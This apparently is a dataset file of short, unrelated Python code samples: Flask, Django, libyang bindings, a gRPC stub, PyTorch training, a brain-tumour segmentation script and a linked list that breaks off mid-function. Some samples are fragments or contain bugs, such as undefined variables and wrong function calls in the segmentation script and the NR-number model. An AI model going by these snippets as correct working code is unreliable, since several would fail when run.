from flask import flash def Euclidean_Algorithm(number_x, number_y): try: x, y = int(number_x), int(number_y) r = x % y while r > 0: x = y y = r r = x % y else: gcd = y anser = str(number_x)+"と"+str(number_y)+"の最大公約数は"+str(gcd) except: anser = "Error" flash("エラー:もう一度入力してください") return anser
nilq/baby-python
python
def extract_json(html):
nilq/baby-python
python
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE from __future__ import absolute_import from awkward._ext import fromjson from awkward._ext import uproot_issue_90
nilq/baby-python
python
from django.urls import path #from account.forms import LoginForm from django.views.generic.base import TemplateView # new from . import views app_name = 'home' urlpatterns = [ #ex: /roster/ path('', views.index, name='index'), path('coachhome/<int:pk>', views.coachhome.as_view(template_name='coachhome.html'), name='coachhome'), path('coachhome/1',views.coachhome.as_view(template_name='coachhome.html')), path('coachhome/2',views.coachhome.as_view(template_name='coachhome.html')), path('coachhome/3',views.coachhome.as_view(template_name='coachhome.html')), # ne path('coachhome/subs',views.coachhome.as_view(template_name='coachhome.html')), path('coachhome/shot',views.coachhome.as_view(template_name = 'coachhome.html')), path('coachhome/stat',views.coachhome.as_view(template_name='coachhome.html')), path('coachhome/event', views.statEvent, name='statEvent'), path('coachhome/analytics/<int:pk>', views.analytics.as_view(template_name= 'analytics.html'), name='analytics'), ]
nilq/baby-python
python
# Copyright (c) 2018-2019 Robin Jarry # SPDX-License-Identifier: BSD-3-Clause from _libyang import ffi from _libyang import lib from .util import c2str from .util import str2c #------------------------------------------------------------------------------ def schema_in_format(fmt_string): if fmt_string == 'yang': return lib.LYS_IN_YANG if fmt_string == 'yin': return lib.LYS_IN_YIN raise ValueError('unknown schema input format: %r' % fmt_string) #------------------------------------------------------------------------------ def schema_out_format(fmt_string): if fmt_string == 'yang': return lib.LYS_OUT_YANG if fmt_string == 'yin': return lib.LYS_OUT_YIN if fmt_string == 'tree': return lib.LYS_OUT_TREE if fmt_string == 'info': return lib.LYS_OUT_INFO if fmt_string == 'json': return lib.LYS_OUT_JSON raise ValueError('unknown schema output format: %r' % fmt_string) #------------------------------------------------------------------------------ class Module: def __init__(self, context, module_p): self.context = context self._module = module_p def name(self): return c2str(self._module.name) def prefix(self): return c2str(self._module.prefix) def description(self): return c2str(self._module.dsc) def filepath(self): return c2str(self._module.filepath) def implemented(self): return bool(lib.lypy_module_implemented(self._module)) def feature_enable(self, name): ret = lib.lys_features_enable(self._module, str2c(name)) if ret != 0: raise self.context.error('no such feature: %r' % name) def feature_enable_all(self): self.feature_enable('*') def feature_disable(self, name): ret = lib.lys_features_disable(self._module, str2c(name)) if ret != 0: raise self.context.error('no such feature: %r' % name) def feature_disable_all(self): self.feature_disable('*') def feature_state(self, name): ret = lib.lys_features_state(self._module, str2c(name)) if ret < 0: raise self.context.error('no such feature: %r' % name) return bool(ret) def features(self): for i in range(self._module.features_size): yield Feature(self.context, self._module.features[i]) def get_feature(self, name): for f in self.features(): if f.name() == name: return f raise self.context.error('no such feature: %r' % name) def revisions(self): for i in range(self._module.rev_size): yield Revision(self.context, self._module.rev[i]) def __iter__(self): return self.children() def children(self, types=None): return iter_children(self.context, self._module, types=types) def __str__(self): return self.name() def print_mem(self, fmt='tree', path=None): fmt = schema_out_format(fmt) buf = ffi.new('char **') ret = lib.lys_print_mem(buf, self._module, fmt, str2c(path), 0, 0) if ret != 0: raise self.context.error('cannot print module') try: return c2str(buf[0]) finally: lib.free(buf[0]) def print_file(self, fileobj, fmt='tree', path=None): fmt = schema_out_format(fmt) ret = lib.lys_print_fd( fileobj.fileno(), self._module, fmt, str2c(path), 0, 0) if ret != 0: raise self.context.error('cannot print module') def parse_data_dict(self, dic, parent=None, rpc_input=False, rpc_output=False): """ Convert a python dictionary to a DNode object following the schema of this module. The returned value is always a top-level data node (i.e.: without parent). :arg dict dic: The python dictionary to convert. :arg DNode parent: Optional parent to update. If not specified a new top-level DNode will be created. :arg bool rpc_input: If True, dic will be parsed by looking in the rpc input nodes. :arg bool rpc_output: If True, dic will be parsed by looking in the rpc output nodes. """ from .data import dict_to_dnode # circular import return dict_to_dnode(dic, self, parent=parent, rpc_input=rpc_input, rpc_output=rpc_output) #------------------------------------------------------------------------------ class Revision: def __init__(self, context, rev_p): self.context = context self._rev = rev_p def date(self): return c2str(self._rev.date) def description(self): return c2str(self._rev.dsc) def reference(self): return c2str(self._rev.ref) def extensions(self): for i in range(self._rev.ext_size): yield Extension(self.context, self._rev.ext[i]) def get_extension(self, name, prefix=None, arg_value=None): for ext in self.extensions(): if ext.name() != name: continue if prefix is not None and ext.module().name() != prefix: continue if arg_value is not None and ext.argument() != arg_value: continue return ext return None def __repr__(self): cls = self.__class__ return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self)) def __str__(self): return self.date() #------------------------------------------------------------------------------ class Extension: def __init__(self, context, ext_p): self.context = context self._ext = ext_p self._def = getattr(ext_p, 'def') def name(self): return c2str(self._def.name) def argument(self): return c2str(self._ext.arg_value) def module(self): module_p = lib.lys_main_module(self._def.module) if not module_p: raise self.context.error('cannot get module') return Module(self.context, module_p) def __repr__(self): cls = self.__class__ return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self)) def __str__(self): return self.name() #------------------------------------------------------------------------------ class Type: DER = lib.LY_TYPE_DER BINARY = lib.LY_TYPE_BINARY BITS = lib.LY_TYPE_BITS BOOL = lib.LY_TYPE_BOOL DEC64 = lib.LY_TYPE_DEC64 EMPTY = lib.LY_TYPE_EMPTY ENUM = lib.LY_TYPE_ENUM IDENT = lib.LY_TYPE_IDENT INST = lib.LY_TYPE_INST LEAFREF = lib.LY_TYPE_LEAFREF STRING = lib.LY_TYPE_STRING UNION = lib.LY_TYPE_UNION INT8 = lib.LY_TYPE_INT8 UINT8 = lib.LY_TYPE_UINT8 INT16 = lib.LY_TYPE_INT16 UINT16 = lib.LY_TYPE_UINT16 INT32 = lib.LY_TYPE_INT32 UINT32 = lib.LY_TYPE_UINT32 INT64 = lib.LY_TYPE_INT64 UINT64 = lib.LY_TYPE_UINT64 BASENAMES = { DER: 'derived', BINARY: 'binary', BITS: 'bits', BOOL: 'boolean', DEC64: 'decimal64', EMPTY: 'empty', ENUM: 'enumeration', IDENT: 'identityref', INST: 'instance-id', LEAFREF: 'leafref', STRING: 'string', UNION: 'union', INT8: 'int8', UINT8: 'uint8', INT16: 'int16', UINT16: 'uint16', INT32: 'int32', UINT32: 'uint32', INT64: 'int64', UINT64: 'uint64', } def __init__(self, context, type_p): self.context = context self._type = type_p def get_bases(self): if self._type.base == lib.LY_TYPE_DER: yield from self.derived_type().get_bases() elif self._type.base == lib.LY_TYPE_LEAFREF: yield from self.leafref_type().get_bases() elif self._type.base == lib.LY_TYPE_UNION: for t in self.union_types(): yield from t.get_bases() else: # builtin type yield self def name(self): if self._type.der: return c2str(self._type.der.name) return self.basename() def description(self): if self._type.der: return c2str(self._type.der.dsc) return None def base(self): return self._type.base def bases(self): for b in self.get_bases(): yield b.base() def basename(self): return self.BASENAMES.get(self._type.base, 'unknown') def basenames(self): for b in self.get_bases(): yield b.basename() def derived_type(self): if not self._type.der: return None return Type(self.context, ffi.addressof(self._type.der.type)) def leafref_type(self): if self._type.base != self.LEAFREF: return None lref = self._type.info.lref return Type(self.context, ffi.addressof(lref.target.type)) def union_types(self): if self._type.base != self.UNION: return t = self._type while t.info.uni.count == 0: t = ffi.addressof(t.der.type) for i in range(t.info.uni.count): yield Type(self.context, t.info.uni.types[i]) def enums(self): if self._type.base != self.ENUM: return t = self._type while t.info.enums.count == 0: t = ffi.addressof(t.der.type) for i in range(t.info.enums.count): e = t.info.enums.enm[i] yield c2str(e.name), c2str(e.dsc) def all_enums(self): for b in self.get_bases(): yield from b.enums() def bits(self): if self._type.base != self.BITS: return t = self._type while t.info.bits.count == 0: t = ffi.addressof(t.der.type) for i in range(t.info.bits.count): b = t.info.bits.bit[i] yield c2str(b.name), c2str(b.dsc) def all_bits(self): for b in self.get_bases(): yield from b.bits() NUM_TYPES = frozenset( (INT8, INT16, INT32, INT64, UINT8, UINT16, UINT32, UINT64)) def range(self): if self._type.base in self.NUM_TYPES and self._type.info.num.range: return c2str(self._type.info.num.range.expr) elif self._type.base == self.DEC64 and self._type.info.dec64.range: return c2str(self._type.info.dec64.range.expr) elif self._type.der: return self.derived_type().range() return None def all_ranges(self): if self._type.base == lib.LY_TYPE_UNION: for t in self.union_types(): yield from t.all_ranges() else: rng = self.range() if rng is not None: yield rng def length(self): if self._type.base == self.STRING and self._type.info.str.length: return c2str(self._type.info.str.length.expr) elif self._type.base == self.BINARY and self._type.info.binary.length: return c2str(self._type.info.binary.length.expr) elif self._type.der: return self.derived_type().length() return None def all_lengths(self): if self._type.base == lib.LY_TYPE_UNION: for t in self.union_types(): yield from t.all_lengths() else: length = self.length() if length is not None: yield length def patterns(self): if self._type.base != self.STRING: return for i in range(self._type.info.str.pat_count): p = self._type.info.str.patterns[i] if not p: continue # in case of pattern restriction, the first byte has a special # meaning: 0x06 (ACK) for regular match and 0x15 (NACK) for # invert-match invert_match = p.expr[0] == 0x15 # yield tuples like: # ('[a-zA-Z_][a-zA-Z0-9\-_.]*', False) # ('[xX][mM][lL].*', True) yield c2str(p.expr + 1), invert_match if self._type.der: yield from self.derived_type().patterns() def all_patterns(self): if self._type.base == lib.LY_TYPE_UNION: for t in self.union_types(): yield from t.all_patterns() else: yield from self.patterns() def module(self): module_p = lib.lys_main_module(self._type.der.module) if not module_p: raise self.context.error('cannot get module') return Module(self.context, module_p) def extensions(self): for i in range(self._type.ext_size): yield Extension(self.context, self._type.ext[i]) if self._type.parent: for i in range(self._type.parent.ext_size): yield Extension(self.context, self._type.parent.ext[i]) def get_extension(self, name, prefix=None, arg_value=None): for ext in self.extensions(): if ext.name() != name: continue if prefix is not None and ext.module().name() != prefix: continue if arg_value is not None and ext.argument() != arg_value: continue return ext return None def __repr__(self): cls = self.__class__ return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self)) def __str__(self): return self.name() #------------------------------------------------------------------------------ class Feature: def __init__(self, context, feature_p): self.context = context self._feature = feature_p def name(self): return c2str(self._feature.name) def description(self): return c2str(self._feature.dsc) def reference(self): return c2str(self._feature.ref) def state(self): return bool(self._feature.flags & lib.LYS_FENABLED) def deprecated(self): return bool(self._feature.flags & lib.LYS_STATUS_DEPRC) def obsolete(self): return bool(self._feature.flags & lib.LYS_STATUS_OBSLT) def if_features(self): for i in range(self._feature.iffeature_size): yield IfFeatureExpr(self.context, self._feature.iffeature[i]) def module(self): module_p = lib.lys_main_module(self._feature.module) if not module_p: raise self.context.error('cannot get module') return Module(self.context, module_p) def __str__(self): return self.name() #------------------------------------------------------------------------------ class IfFeatureExpr: def __init__(self, context, iffeature_p): self.context = context self._iffeature = iffeature_p def _get_operator(self, position): # the ->exp field is a 2bit array of operator values stored under # a uint8_t C array. mask = 0x3 # 2bits mask shift = 2 * (position % 4) item = self._iffeature.expr[position // 4] result = item & (mask << shift) return result >> shift def _operands(self): op_index = 0 ft_index = 0 expected = 1 while expected > 0: operator = self._get_operator(op_index) op_index += 1 if operator == lib.LYS_IFF_F: yield IfFeature(self.context, self._iffeature.features[ft_index]) ft_index += 1 expected -= 1 elif operator == lib.LYS_IFF_NOT: yield IfNotFeature elif operator == lib.LYS_IFF_AND: yield IfAndFeatures expected += 1 elif operator == lib.LYS_IFF_OR: yield IfOrFeatures expected += 1 def tree(self): def _tree(operands): op = next(operands) if op is IfNotFeature: return op(self.context, _tree(operands)) elif op in (IfAndFeatures, IfOrFeatures): return op(self.context, _tree(operands), _tree(operands)) else: return op return _tree(self._operands()) def dump(self): return self.tree().dump() def __str__(self): return str(self.tree()).strip('()') #------------------------------------------------------------------------------ class IfFeatureExprTree: def dump(self, indent=0): raise NotImplementedError() def __str__(self): raise NotImplementedError() #------------------------------------------------------------------------------ class IfFeature(IfFeatureExprTree): def __init__(self, context, feature_p): self.context = context self._feature = feature_p def feature(self): return Feature(self.context, self._feature) def dump(self, indent=0): feat = self.feature() return '%s%s [%s]\n' % (' ' * indent, feat.name(), feat.description()) def __str__(self): return self.feature().name() #------------------------------------------------------------------------------ class IfNotFeature(IfFeatureExprTree): def __init__(self, context, child): self.context = context self.child = child def dump(self, indent=0): return ' ' * indent + 'NOT\n' + self.child.dump(indent + 1) def __str__(self): return 'NOT %s' % self.child #------------------------------------------------------------------------------ class IfAndFeatures(IfFeatureExprTree): def __init__(self, context, a, b): self.context = context self.a = a self.b = b def dump(self, indent=0): s = ' ' * indent + 'AND\n' s += self.a.dump(indent + 1) s += self.b.dump(indent + 1) return s def __str__(self): return '%s AND %s' % (self.a, self.b) #------------------------------------------------------------------------------ class IfOrFeatures(IfFeatureExprTree): def __init__(self, context, a, b): self.context = context self.a = a self.b = b def dump(self, indent=0): s = ' ' * indent + 'OR\n' s += self.a.dump(indent + 1) s += self.b.dump(indent + 1) return s def __str__(self): return '(%s OR %s)' % (self.a, self.b) #------------------------------------------------------------------------------ class SNode: CONTAINER = lib.LYS_CONTAINER LEAF = lib.LYS_LEAF LEAFLIST = lib.LYS_LEAFLIST LIST = lib.LYS_LIST RPC = lib.LYS_RPC INPUT = lib.LYS_INPUT OUTPUT = lib.LYS_OUTPUT KEYWORDS = { CONTAINER: 'container', LEAF: 'leaf', LEAFLIST: 'leaf-list', LIST: 'list', RPC: 'rpc', INPUT: 'input', OUTPUT: 'output', } def __init__(self, context, node_p): self.context = context self._node = node_p def nodetype(self): return self._node.nodetype def keyword(self): return self.KEYWORDS.get(self._node.nodetype, '???') def name(self): return c2str(self._node.name) def fullname(self): return '%s:%s' % (self.module().name(), self.name()) def description(self): return c2str(self._node.dsc) def config_set(self): return bool(self._node.flags & lib.LYS_CONFIG_SET) def config_false(self): return bool(self._node.flags & lib.LYS_CONFIG_R) def mandatory(self): return bool(self._node.flags & lib.LYS_MAND_TRUE) def deprecated(self): return bool(self._node.flags & lib.LYS_STATUS_DEPRC) def obsolete(self): return bool(self._node.flags & lib.LYS_STATUS_OBSLT) def status(self): if self._node.flags & lib.LYS_STATUS_DEPRC: return 'deprecated' elif self._node.flags & lib.LYS_STATUS_OBSLT: return 'obsolete' return 'current' def module(self): module_p = lib.lys_node_module(self._node) if not module_p: raise self.context.error('cannot get module') return Module(self.context, module_p) def schema_path(self): try: s = lib.lys_path(self._node, 0) return c2str(s) finally: lib.free(s) def data_path(self, key_placeholder="'%s'"): try: s = lib.lys_data_path_pattern(self._node, str2c(key_placeholder)) return c2str(s) finally: lib.free(s) def extensions(self): for i in range(self._node.ext_size): yield Extension(self.context, self._node.ext[i]) def get_extension(self, name, prefix=None, arg_value=None): for ext in self.extensions(): if ext.name() != name: continue if prefix is not None and ext.module().name() != prefix: continue if arg_value is not None and ext.argument() != arg_value: continue return ext return None def if_features(self): for i in range(self._node.iffeature_size): yield IfFeatureExpr(self.context, self._node.iffeature[i]) def parent(self): parent_p = lib.lys_parent(self._node) while parent_p and parent_p.nodetype not in SNode.NODETYPE_CLASS: parent_p = lib.lys_parent(parent_p) if parent_p: return SNode.new(self.context, parent_p) return None def __repr__(self): cls = self.__class__ return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self)) def __str__(self): return self.name() def parse_data_dict(self, dic, parent=None, rpc_input=False, rpc_output=False): """ Convert a python dictionary to a DNode object following the schema of this module. The returned value is always a top-level data node (i.e.: without parent). :arg dict dic: The python dictionary to convert. :arg DNode parent: Optional parent to update. If not specified a new top-level DNode will be created. :arg bool rpc_input: If True, dic will be parsed by looking in the rpc input nodes. :arg bool rpc_output: If True, dic will be parsed by looking in the rpc output nodes. """ from .data import dict_to_dnode # circular import return dict_to_dnode(dic, self, parent=parent, rpc_input=rpc_input, rpc_output=rpc_output) NODETYPE_CLASS = {} @classmethod def register(cls, nodetype): def _decorator(nodeclass): cls.NODETYPE_CLASS[nodetype] = nodeclass return nodeclass return _decorator @classmethod def new(cls, context, node_p): nodecls = cls.NODETYPE_CLASS.get(node_p.nodetype, SNode) return nodecls(context, node_p) #------------------------------------------------------------------------------ @SNode.register(SNode.LEAF) class SLeaf(SNode): def __init__(self, context, node_p): super().__init__(context, node_p) self._leaf = ffi.cast('struct lys_node_leaf *', node_p) def default(self): return c2str(self._leaf.dflt) def units(self): return c2str(self._leaf.units) def type(self): return Type(self.context, ffi.addressof(self._leaf.type)) def is_key(self): if lib.lys_is_key(self._leaf, ffi.NULL): return True return False def must_conditions(self): for i in range(self._leaf.must_size): yield c2str(self._leaf.must[i].expr) def __str__(self): return '%s %s' % (self.name(), self.type().name()) #------------------------------------------------------------------------------ @SNode.register(SNode.LEAFLIST) class SLeafList(SNode): def __init__(self, context, node_p): super().__init__(context, node_p) self._leaflist = ffi.cast('struct lys_node_leaflist *', node_p) def ordered(self): return bool(self._node.flags & lib.LYS_USERORDERED) def units(self): return c2str(self._leaflist.units) def type(self): return Type(self.context, ffi.addressof(self._leaflist.type)) def defaults(self): for i in range(self._leaflist.dflt_size): yield c2str(self._leaflist.dflt[i]) def must_conditions(self): for i in range(self._leaflist.must_size): yield c2str(self._leaflist.must[i].expr) def __str__(self): return '%s %s' % (self.name(), self.type().name()) #------------------------------------------------------------------------------ @SNode.register(SNode.CONTAINER) class SContainer(SNode): def __init__(self, context, node_p): super().__init__(context, node_p) self._container = ffi.cast('struct lys_node_container *', node_p) def presence(self): return c2str(self._container.presence) def must_conditions(self): for i in range(self._container.must_size): yield c2str(self._container.must[i].expr) def __iter__(self): return self.children() def children(self, types=None): return iter_children(self.context, self._node, types=types) #------------------------------------------------------------------------------ @SNode.register(SNode.LIST) class SList(SNode): def __init__(self, context, node_p): super().__init__(context, node_p) self._list = ffi.cast('struct lys_node_list *', node_p) def ordered(self): return bool(self._node.flags & lib.LYS_USERORDERED) def __iter__(self): return self.children() def children(self, skip_keys=False, types=None): return iter_children( self.context, self._node, skip_keys=skip_keys, types=types) def keys(self): for i in range(self._list.keys_size): node = ffi.cast('struct lys_node *', self._list.keys[i]) yield SLeaf(self.context, node) def must_conditions(self): for i in range(self._list.must_size): yield c2str(self._list.must[i].expr) def __str__(self): return '%s [%s]' % ( self.name(), ', '.join(k.name() for k in self.keys())) #------------------------------------------------------------------------------ @SNode.register(SNode.INPUT) @SNode.register(SNode.OUTPUT) class SRpcInOut(SNode): def __iter__(self): return self.children() def must_conditions(self): return () def children(self, types=None): return iter_children(self.context, self._node, types=types) #------------------------------------------------------------------------------ @SNode.register(SNode.RPC) class SRpc(SNode): def must_conditions(self): return () def input(self): try: return next(iter_children( self.context, self._node, types=(self.INPUT,), options=lib.LYS_GETNEXT_WITHINOUT)) except StopIteration: return None def output(self): try: return next(iter_children( self.context, self._node, types=(self.OUTPUT,), options=lib.LYS_GETNEXT_WITHINOUT)) except StopIteration: return None def __iter__(self): return self.children() def children(self, types=None): return iter_children(self.context, self._node, types=types) #------------------------------------------------------------------------------ def iter_children(context, parent, skip_keys=False, types=None, options=0): if types is None: types = (lib.LYS_CONTAINER, lib.LYS_LIST, lib.LYS_RPC, lib.LYS_LEAF, lib.LYS_LEAFLIST) def _skip(node): if node.nodetype not in types: return True if not skip_keys: return False if node.nodetype != lib.LYS_LEAF: return False leaf = ffi.cast('struct lys_node_leaf *', node) if lib.lys_is_key(leaf, ffi.NULL): return True return False if ffi.typeof(parent) == ffi.typeof('struct lys_module *'): module = parent parent = ffi.NULL else: module = ffi.NULL child = lib.lys_getnext(ffi.NULL, parent, module, options) while child: if not _skip(child): yield SNode.new(context, child) child = lib.lys_getnext(child, parent, module, options) #------------------------------------------------------------------------------ # compat Container = SContainer Leaf = SLeaf LeafList = SLeafList List = SList Node = SNode Rpc = SRpc RpcInOut = SRpcInOut
nilq/baby-python
python
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! import grpc from google.ads.google_ads.v1.proto.resources import language_constant_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2 from google.ads.google_ads.v1.proto.services import language_constant_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2 class LanguageConstantServiceStub(object): """Service to fetch language constants. """ def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.GetLanguageConstant = channel.unary_unary( '/google.ads.googleads.v1.services.LanguageConstantService/GetLanguageConstant', request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2.GetLanguageConstantRequest.SerializeToString, response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2.LanguageConstant.FromString, ) class LanguageConstantServiceServicer(object): """Service to fetch language constants. """ def GetLanguageConstant(self, request, context): """Returns the requested language constant. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_LanguageConstantServiceServicer_to_server(servicer, server): rpc_method_handlers = { 'GetLanguageConstant': grpc.unary_unary_rpc_method_handler( servicer.GetLanguageConstant, request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2.GetLanguageConstantRequest.FromString, response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2.LanguageConstant.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'google.ads.googleads.v1.services.LanguageConstantService', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,))
nilq/baby-python
python
import logging from torch.utils.tensorboard import SummaryWriter from utils.utils_common import DataModes import torch logger = logging.getLogger(__name__) class Trainer(object): def training_step(self, data, epoch): # Get the minibatch x, y = data self.optimizer.zero_grad() loss, log = self.net.loss(x, y) loss.backward() self.optimizer.step() return log def __init__(self, net, trainloader, optimizer, epoch_count, eval_every, save_path, evaluator, log_msg): self.net = net self.trainloader = trainloader self.optimizer = optimizer self.numb_of_epochs = epoch_count self.eval_every = eval_every self.save_path = save_path self.evaluator = evaluator self.log_msg = log_msg def train(self): logger.info("Start training...") writer = SummaryWriter(self.save_path) for epoch in range(self.numb_of_epochs): # loop over the dataset multiple times running_loss = {} for data in self.trainloader: # training step loss = self.training_step(data, epoch) # print statistics for key, value in loss.items(): running_loss[key] = (running_loss[key] + value) if key in running_loss else 0 if epoch % self.eval_every == self.eval_every-1: # print every K epochs logger.info('epoch: {}, tr_loss: {:4f}'.format(epoch, running_loss['loss'] / self.eval_every)) for key, value in running_loss.items(): writer.add_scalar(DataModes.TRAINING + '/' + key, value, epoch) self.evaluator.evaluate(epoch, writer) running_loss = 0.0 logger.info("... end of training!")
nilq/baby-python
python
from datetime import datetime from . import db, ma class NRNumber(db.Model): __tablename__ = 'nr_number' # core fields id = db.Column(db.Integer, primary_key=True) nrNum = db.Column('nr_num', db.String(10), unique=True) lastUpdate = db.Column('last_update', db.DateTime(timezone=True), default=datetime.utcnow, onupdate=datetime.utcnow) @classmethod def get_next_nr_num(cls, last_nr): last_nr_header = last_nr[0:4] last_number = last_nr[4:10] if last_number == '999999': # next_nr_header = #next letter in the alphabet starting at a specific letter next_number = '000000' else: next_nr_header = last_nr_header next_number = str((int(last_number) + 1)).zfill(6) next_nr_num = next_nr_header + next_number return (next_nr_num) def json(self): return {'id': self.id, 'nrNum': self.nrNum } def save_to_db(self): db.session.add(self) db.session.commit() class NRNumberSchema(ma.ModelSchema): class Meta: model = NRNumber
nilq/baby-python
python
""" This module provides some helper methods to deal with multidimensional arrays of different axes order. """ import numpy as np def adjustOrder(volume, inputAxes, outputAxes="txyzc"): """ This method allows to convert a given `volume` (with given `inputAxes` ordering) into a different axis ordering, specified as `outputAxes` string (e.g. "xyzt"). Allowed axes are `t`, `x`, `y`, `z`, `c`. The default format volumes are converted to is "txyzc", axes that are missing in the input volume are created with size 1. """ assert isinstance(volume, np.ndarray) assert len(volume.shape) == len(inputAxes) assert len(outputAxes) >= len(inputAxes) assert not any(a not in "txyzc" for a in outputAxes) assert not any(a not in "txyzc" for a in inputAxes) outVolume = volume # find present and missing axes positions = {} missingAxes = [] for axis in outputAxes: try: positions[axis] = inputAxes.index(axis) except ValueError: missingAxes.append(axis) # insert missing axes at the end for m in missingAxes: outVolume = np.expand_dims(outVolume, axis=-1) positions[m] = outVolume.ndim - 1 # transpose axesRemapping = [positions[a] for a in outputAxes] outVolume = np.transpose(outVolume, axes=axesRemapping) return outVolume def getFrameSlicing(inputAxes, selectValue, selectAxis="t"): """ This methods helps to get a slice of a multidimensional array of the specified `inputAxes`, where only for one specific axis (`selectAxis`) an index (or a list of indices, or a slicing object) is given. Example: `myarray[getFrameSlicing('xzt', 3, t)]` Example: `myarray[getFrameSlicing('xzt', [3,7,9], t)]` """ assert len(selectAxis) == 1 assert inputAxes.count(selectAxis) == 1 slicing = tuple() for a in inputAxes: if a == selectAxis: slicing += (selectValue,) else: slicing += (slice(None),) return slicing
nilq/baby-python
python
from keras.models import load_model from glob import glob import keras import numpy as np from losses import * import random from keras.models import Model from extract_patches import Pipeline from scipy.misc import imresize from keras.utils import np_utils import SimpleITK as sitk import pdb import matplotlib.pyplot as plt import os from scipy.ndimage.measurements import label import cv2 from scipy.ndimage.morphology import binary_dilation, generate_binary_structure import matplotlib.gridspec as gridspec import imgaug as ia import imgaug.augmenters as iaa from imgaug import parameters as iap # from evaluation_metrics import * path_HGG = glob('/home/pi/Projects/beyondsegmentation/HGG/**') path_LGG = glob('/home/pi/Projects/beyondsegmentation/LGG**') test_path=glob('/home/parth/Interpretable_ML/BraTS_2018/val/**') np.random.seed(2022) np.random.shuffle(test_path) def normalize_scheme(slice_not): ''' normalizes each slice, excluding gt subtracts mean and div by std dev for each slice clips top and bottom one percent of pixel intensities ''' normed_slices = np.zeros(( 4,155, 240, 240)) for slice_ix in range(4): normed_slices[slice_ix] = slice_not[slice_ix] for mode_ix in range(155): normed_slices[slice_ix][mode_ix] = _normalize(slice_not[slice_ix][mode_ix]) return normed_slices def _normalize(slice): b = np.percentile(slice, 99) t = np.percentile(slice, 1) slice = np.clip(slice, t, b) image_nonzero = slice[np.nonzero(slice)] if np.std(slice)==0 or np.std(image_nonzero) == 0: return slice else: tmp= (slice - np.mean(image_nonzero)) / np.std(image_nonzero) tmp[tmp==tmp.min()]=-9 return tmp def load_vol(filepath_image, model_type, slice_): ''' segment the input volume INPUT (1) str 'filepath_image': filepath of the volume to predict (2) bool 'show': True to , OUTPUt (1) np array of the predicted volume (2) np array of the corresping ground truth ''' #read the volume flair = glob( filepath_image + '/*_flair.nii.gz') t2 = glob( filepath_image + '/*_t2.nii.gz') gt = glob( filepath_image + '/*_seg.nii.gz') t1s = glob( filepath_image + '/*_t1.nii.gz') t1c = glob( filepath_image + '/*_t1ce.nii.gz') t1=[scan for scan in t1s if scan not in t1c] if (len(flair)+len(t2)+len(gt)+len(t1)+len(t1c))<5: print("there is a problem here!!! the problem lies in this patient :") scans_test = [flair[0], t1[0], t1c[0], t2[0], gt[0]] test_im = [sitk.GetArrayFromImage(sitk.ReadImage(scans_test[i])) for i in range(len(scans_test))] test_im=np.array(test_im).astype(np.float32) test_image = test_im[0:4] gt=test_im[-1] gt[gt==4]=3 #normalize each slice following the same scheme used for training test_image = normalize_scheme(test_image) #transform teh data to channels_last keras format test_image = test_image.swapaxes(0,1) test_image=np.transpose(test_image,(0,2,3,1)) test_image, gt = np.array(test_image[slice_]), np.array(gt[slice_]) if model_type == 'dense': npad = ((8, 8), (8, 8), (0, 0)) test_image = np.pad(test_image, pad_width=npad, mode='constant', constant_values=0) npad = ((8, 8), (8, 8)) gt = np.pad(gt, pad_width=npad, mode='constant', constant_values=0) return test_image, gt class Test_Time_Augmentation(): def __init__(self): self.aug = iaa.SomeOf(3, [iaa.Affine( rotate=iap.Normal(0.0, 3), translate_px=iap.Normal(0.0, 3)), iaa.AdditiveGaussianNoise(scale=0.3 * np.ptp(test_image) - 9), iaa.Noop(), iaa.MotionBlur(k=3, angle = [-2, 2]) ], random_order=True) def predict_aleatoric(self, model, test_image, iterations=1000, dropout=0.5): predictions = [] for i in range(iterations): aug_image = aug.augment_images(test_image) predictions.append(model.predict(aug_image)) predictions = np.array(predictions) mean = np.mean(predictions, axis = 0) var = np.var(predictions, axis = 0) print(mean.shape) plt.imshow(np.argmax(mean, axis = -1).reshape((240, 240)), vmin = 0., vmax = 3.) plt.show() plt.figure(figsize = (8, 8)) plt.imshow(np.mean(var[:, :, :, 1:], axis = -1).reshape((240, 240))) plt.colorbar() plt.show() if __name__ == '__main__': test_image, gt = load_vol(test_path[0]) model = load_model('/home/parth/Interpretable_ML/Brain-tumor-segmentation/checkpoints/Unet_MC/UnetRes_MC.h5') model.load_weights('/home/parth/Interpretable_ML/Brain-tumor-segmentation/checkpoints/Unet_MC/UnetRes.60_1.066.hdf5', by_name = True) D = Test_Time_Augmentation() D.predict_aleatoric(model_res, test_image, iterations = 100, dropout = 0.)
nilq/baby-python
python
class Node: def __init__(self, value): self.value = value self.next = None def __repr__(self): return str(self.value) class LinkedList: def __init__(self): self.head = None def __str__(self): cur_head = self.head out_string = "" while cur_head: out_string += str(cur_head.value) + " -> " cur_head = cur_head.next return out_string def append(self, value): if self.head is None: self.head = Node(value) return node = self.head while node.next: node = node.next node.next = Node(value) def pop(self): if self.head is None: return None node = self.head self.head = self.head.next return node def size(self): size = 0 node = self.head while node: size += 1 node = node.next return size def union(llist_1, llist_2): union_set = set() output = LinkedList() while llist_1.head is not None: union_set.add(llist_1.pop().value) while llist_2.head is not None: union_set.add(llist_2.pop().value) for num in union_set: output.append(num) return output def intersection(llist_1, llist_2): l1_set = set() l2_set = set() intersection = set() output = LinkedList() while llist_1.head is not None: l1_set.add(llist_1.pop().value) while llist_2.head is not None: l2_set.add(llist_2.pop().value) for elem in l1_set: if elem in l2_set: intersection.add(elem) for 